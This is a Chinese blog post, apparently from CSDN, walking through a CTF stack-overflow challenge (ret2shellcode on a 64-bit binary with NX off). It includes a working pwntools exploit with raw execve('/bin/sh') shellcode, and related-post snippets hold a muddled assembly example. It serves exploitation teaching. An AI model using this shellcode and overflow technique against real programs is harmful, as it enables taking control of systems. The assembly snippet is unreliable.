栈溢出入门0x02 ret2shellcode

于 2024-10-02 00:48:18 发布
阅读量669 收藏 11
点赞数 6
文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kenwblack/article/details/142674562
版权

前言:

在上一篇博客中我们实现了ret2text。这是非常理想的环境,没有任何保护措施,甚至还有一个后门函数。但是这种好事可不会一直发生,如果没有后门函数怎么办?

这次的目标是get shell。

例题:

为了保证大家在实验的时候有相同的效果,我们统一使用https://github.com/ctf-wiki/ctf-challenges中的里边ctf-challenges-master\pwn\stackoverflow\ret2shellcode\sniperoj-pwn100-shellcode-x86-64文件夹中的shellcode可执行文件。

分析:

IDA反编译:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  __int64 buf[2]; // [rsp+0h] [rbp-10h] BYREF

  buf[0] = 0LL;
  buf[1] = 0LL;
  setvbuf(_bss_start, 0LL, 1, 0LL);
  puts("Welcome to Sniperoj!");
  printf("Do your kown what is it : [%p] ?\n", buf);
  puts("Now give me your answer : ");
  read(0, buf, 64uLL);
  return 0;
}

然后checksec:

                                                                        图1

开了PIE保护,但是NX保护没开,如果能绕过PIE就可以ret2shellcode。

分析源码发现,buf到rbp的空间为0x10,而read的大小为0x40,明显存在溢出,因此我们能够使用read来进行栈溢出,偏移量为0x10+8=24。
其次发现代码中已经动态的输出了buf的地址,因此随机化地址便可以进行绕过。

计算允许的shellcode长度

只读取了0x40字节,所以我们的payload最大就是0x40字节。

0x40-(0x10+8)- 8 = 32位,(0x10+8)为造成溢出填充的垃圾数据,后面8为是shellcode地址的长度。因此构建的shellcode必须在32位以内。

之前使用的shellcraft.sh()生成的shellcode有44字节,在这里只有32字节,因此并不适用,
需要我们到

https://www.exploit-db.com/shellcodes
http://shell-storm.org/shellcode/

查询构造相应的shellcode。

我们打算将shellcode放到一个相对于buf的位置,注意由于buf到ebp只有0x10,但是我们找到的shellcode有0x17字节,所以shellcode必须放到return address后边。如果shellcode放到buf里,shellcode里的一部分就会覆盖到return address,导致segment fault。所以payload 布局就是:

payload = padding+ shellcode相对于buf的位置+shellcode

exp:

from pwn import *

code = ELF('./shellcode')
sh = process('./shellcode')

# 23 bytes
# https://www.exploit-db.com/exploits/36858/
shellcode_x64 = b"\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"
sh.recvuntil(b'[')
buf_addr = sh.recvuntil(b']', drop=True)#获得输出的buf地址
buf_addr = int(buf_addr, 16)
payload = b'b' * 24 + p64(buf_addr + 32) + shellcode_x64
print(payload)
#gdb.attach(sh)
sh.sendline(payload)
sh.interactive()

结果:

                                                                图2

参考文献:

sniperoj-pwn100-shellcode-x86-64(writeup)-CSDN博客

kenwblack
关注
栈溢出入门(ret2shellcode漏洞)
2301_80718478的博客
07-05 552
ret2shellcode,即控制程序执行 shellcode代码。shellcode 指的是用于完成某个功能的汇编代码,常见的功能主要是获取目标系统的 shell。一般来说,shellcode 需要我们自己填充。这其实是另外一种典型的利用方法,即此时我们需要自己去填充一些可执行的代码,然后通过利用,让程序调到shellcode的地址后去执行这里为了学习shellcode漏洞,龙哥更新了源码:这里是依次获取两个字符串并输出。
【pwn-栈溢出】— ret2shellcode
weixin_43988488的博客
03-19 394
【代码】【pwn-栈溢出】— ret2shellcode
栈溢出实例--笔记二(ret2shellcode
一只青木呀
08-01 1937
栈溢出实例--笔记二(ret2shellcode)1、栈溢出含义及栈结构2、ret2shellcode基本思路3、实战一下3.1、二进制程序如下3.2、分析调试查看栈3.3、编写payload获取shell3.4、操作结果 1、栈溢出含义及栈结构 请参考栈溢出实例–笔记一(ret2text) 2、ret2shellcode基本思路 ret2shellcode需要我们控制程序执行shellcode代码。即ret2shellcode的目标就是在栈上写入布局好的shellcode,利用ret-address返回到
pwn基础之ctfwiki-栈溢出-基础ROP-ret2shellcode
qq_52658640的博客
04-22 1221
文章目录前言原理ret2shellcode挖掘漏洞利用漏洞利用脚本(exp)总结 前言 二进制小白的学习记录,是自己写的第二篇文章,相较于第一篇文章我也做了一些改进,希望会越来越好。也希望二进制大佬们及时斧正文章的错误。 原理 ret2shellcode,即控制程序执行 shellcode 代码。shellcode 指的是用于完成某个功能的汇编代码,常见的功能主要是获取目标系统的 shell。一般来说,shellcode 需要我们自己填充。这其实是另外一种典型的利用方法,即此时我们需要自己去填充一些可执
pwn栈溢出学习 基本ROP——ret2shellcode
MrTreebook的博客
11-22 1058
ret2shellcode 目录ret2shellcode1.checksec看一下2.IDA pro看一下 1.checksec看一下 32位的文件 什么保护都没开,并且有可读,可写,可执行段 2.IDA pro看一下 gets函数读入一个 s 然后把 s 复制到 buf2
字符串溢出(pwn溢出)--ret2shellcode
莫慌的博客
09-26 2131
pwn 入门
栈溢出/ret2shellcode/ret2syscall/ret2libc
m0_63220798的博客
08-20 386
(仅作为本人的学习笔记和心得 如有错误请多指教)
堆栈认知——栈溢出实例(ret2shellcode
zhuguanlin121的博客
06-17 715
1、栈溢出含义及栈结构 2、ret2shellcode基本思路 3、实战一下 3.1、二进制程序如下 3.2、分析调试查看栈 3.3、编写payload获取shell 3.4、操作结果
栈溢出 shellcode ret2shellcode
wing_7的博客
10-06 523
shellcode_address = buf_address+0x20 # buf与rbp的距离0x10 + rbp的宽度0x8 + 返回地址的长度0x8。rbp用来存储当前函数状态的基地址,在函数运行时不变,用来索引确定函数的参数或局部变量的位置。将函数的返回地址覆写为我们构造的shell的地址,这样就可以达到获取shell的目的了。将函数的返回地址覆写为我们构造的shell的地址,这样就可以达到获取shell的目的了。栈空间增长方式是从高地址到地址的,也就是栈顶的地址值是小于栈底的地址值的。
pwn小白入门04---ret2shellcode
weixin_45943522的博客
02-21 1947
原理 ret2shellcode,当程序当中没有system函数时,我们需要自己往栈上写入一段shellcode,然后控制eip使其指向shellcode的地址。 shellcode 指的是用于完成某个功能的汇编代码,常见的功能主要是获取目标系统的 shell。 在栈溢出的基础上,要想执行 shellcode,需要对应的程序在运行时,shellcode 所在的区域具有可执行权限。即必须关闭堆栈不可执行功能。 例题(来自ctfwiki): 首先checksec: 发现程序没有开启任何保护,并且存在可读可写
跟着CTF-wiki学pwn——ret2shellcode
qq_42882717的博客
07-01 851
CTF-wiki的注解:ret2shellcode
linux 64位 内存泄漏,64位linux系统:栈溢出+ret2libc ROP attack
weixin_34185033的博客
05-01 693
一.实验要求栈溢出+ ret2libc ROP 操作系统:Ubuntu 16.04 64bit 安全机制:不可执行位保护,ASLR(内存地址随机化)打开安全机制,确保×××能绕过以上安全机制,利用漏洞完成attack,实现基本目标:调用system(“/bin/sh”),打开shell。二.实验概述ret2libc(return-into-libc)是一种利用缓冲区溢出的代码复用技术,...
PWN ret2shellcode
prettyX的博客
11-22 1978
今天天气阴,来做一下ret2shellcode。 记录一下。 : ) 0X00 ret2shellcode原理 ret2shellcode,就是,return to shellcode,即让程序中某个函数执行结束后,返回到shellcode的地址去执行shellcodeshellcode指的是用于完成某个功能的汇编代码,常见的功能主要是获取目标系统的shell。 ret2shellcode...
gdb 查看是否 栈溢出_入坑 CTF-PWN 之 栈溢出入门
weixin_36064196的博客
01-17 769
好久没看过pwn题目了,写一个入门的教程顺便复习了:1. 安装gdb-pedagit clone https://github.com/longld/peda.git ~/pedaecho "source ~/peda/peda.py" >> ~/.gdbinitecho "DONE! debug your program with gdb and enjoy"2. 一些比较有用的技巧...
在 Kali Linux 中安装 Impacket
最新发布
weixin_44023460的博客
09-30 223
在安装 Impacket 之前,你需要确保安装了 Python 和一些必要的依赖。通常,Kali 已经预装了 Python。步骤 3:克隆 Impacket 仓库。步骤 4:进入 Impacket 目录。如果你看到帮助信息,说明安装成功。步骤 5:安装 Impacket。
Linux 安装redis主从模式+哨兵模式3台节点
一千个读者就有一千个哈姆雷特
09-27 407
Linux 安装redis主从模式+哨兵模式3台节点
[Linux]:线程(一)
Bettysweetyaaa的博客
09-26 750
想深入了解线程吗?本文将为你详细解读线程的概念、优缺点、异常及用途,还介绍了 Linux 中线程的控制方法。快来阅读,提升你的编程技能,探索多线程的奥秘!
linux 源代码编译
Lxn2zh的博客
09-27 1351
有时候会在linux上下载源码包,然后进行编译成可执行的文件,这个过程需要经过configure、make、make install、make clean四个步骤。configure 为这个程序在当前的操作系统环境下选择合适的编译器和环境参数来编译该代码。make install 将已编译好的可执行文件安装到操作系统指定或默认的安装目录下。make 对程序代码进行编译操作,会将源码编译成可执行的目标文件。make clean 删除编译时临时产生的目录或文件。
ret2shellcode 64位怎么编写
03-25
在64位的ret2shellcode攻击中,需要使用RIP来控制程序的执行流程,而不是使用EIP。因此,需要在shellcode中构造64位的地址来覆盖RIP寄存器。 一般来说,ret2shellcode需要满足以下条件: 1. 执行栈溢出,覆盖返回地址的同时,还要在溢出数据中注入shellcode。 2. 执行栈溢出时需要找到距离返回地址的偏移量。 3. shellcode需要在堆栈中执行。 下面是一份64位ret2shellcode的示例代码: ```assembly section .text global _start _start: ; 执行栈溢出,将shellcode注入到栈中。 ; 使用msfvenom生成一段简单的execve("/bin/sh")代码 ; msfvenom -a x64 --platform linux -p linux/x64/exec CMD=/bin/sh -f c ; 将生成的shellcode粘贴到这里。 xor esi, esi mov eax, esi ; 将堆栈指针rsp保存到rbx中 mov rbx, rsp next: ; 在栈中查找返回地址的偏移量 ; 这里的偏移量为40,实际上需要根据目标二进制文件的不同而调整 cmp byte [rsp], 0 jne next add rsp, 40 ; 用shellcode的地址覆盖返回地址 ; 这里的地址也需要根据目标二进制文件的不同而调整 mov QWORD [rsp], 0x7fffffffde10 ; 跳转到shellcode的地址,开始执行 jmp rbx ``` 在这个示例中,我们将用msfvenom生成一个简单的execve("/bin/sh")的shellcode,该shellcode将在栈上执行。然后,我们将查询堆栈来计算返回地址距离堆栈指针的偏移量,并手动向该返回地址写入shell代码的地址。最后,我们将跳转回堆栈指针的位置,开始执行我们的shellcode。 需要注意的是,在实际攻击中,偏移量和地址值可能因目标程序的不同而有所变化。因此,需要针对目标程序进行适当的调整。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值